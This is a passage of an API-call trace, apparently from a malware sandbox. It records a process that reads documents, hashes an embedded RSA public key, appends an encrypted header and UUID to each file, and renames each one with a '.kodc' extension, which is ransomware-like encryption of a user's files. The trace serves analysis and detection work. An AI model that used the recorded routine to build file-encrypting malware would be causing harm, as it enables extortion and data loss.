nFileSizeHigh=0x0, nFileSizeLow=0x32b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8z1erq5O_sk6.xls", cAlternateFileName="8Z1ERQ~1.XLS")) returned 1 [0098.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8z1erq5O_sk6.xls") returned=".xls" [0098.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8z1erq5O_sk6.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8z1erq5o_sk6.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.064] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=12976) returned 1 [0098.064] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.067] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x328a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.067] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.068] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.068] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x32b0, lpOverlapped=0x0) returned 1 [0098.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.069] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.069] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.070] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.070] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.070] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.070] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.070] GetLastError () returned 0x0 [0098.070] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.070] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.070] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.070] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.070] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x32b0) returned 0x9b9b950 [0098.070] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340410 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a808 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340458 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a820 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a850 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a868 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.071] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a850 | out: hHeap=0x630000) returned 1 [0098.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a868 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a850 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a850 | out: hHeap=0x630000) returned 1 [0098.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.073] GetCurrentThreadId () returned 0x42c [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6969f8 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.073] GetCurrentThreadId () returned 0x42c [0098.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.074] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x32b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.074] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.075] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.075] CloseHandle (hObject=0x5cc) returned 1 [0098.076] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8z1erq5O_sk6.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8z1erq5o_sk6.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8z1erq5O_sk6.xls.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8z1erq5o_sk6.xls.kodc")) returned 1 [0098.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.077] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.078] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15309790, ftCreationTime.dwHighDateTime=0x1d5c325, ftLastAccessTime.dwLowDateTime=0xb4953710, ftLastAccessTime.dwHighDateTime=0x1d5c12b, ftLastWriteTime.dwLowDateTime=0xb4953710, ftLastWriteTime.dwHighDateTime=0x1d5c12b, nFileSizeHigh=0x0, nFileSizeLow=0x4ce4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8zV-Lb4_.ppt", cAlternateFileName="")) returned 1 [0098.078] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8zV-Lb4_.ppt") returned=".ppt" [0098.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8zV-Lb4_.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8zv-lb4_.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.078] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=19684) returned 1 [0098.078] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.081] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4cbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.081] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.082] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.082] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x4ce4, lpOverlapped=0x0) returned 1 [0098.082] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.083] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.083] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.083] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.084] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.084] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.084] GetLastError () returned 0x0 [0098.084] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.084] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.084] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.084] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.084] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4ce0) returned 0x9ba4d90 [0098.084] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340458 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a820 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33404a0 [0098.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a838 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a868 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.085] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a880 | out: hHeap=0x630000) returned 1 [0098.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a880 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a868 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a880 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.086] GetCurrentThreadId () returned 0x42c [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, 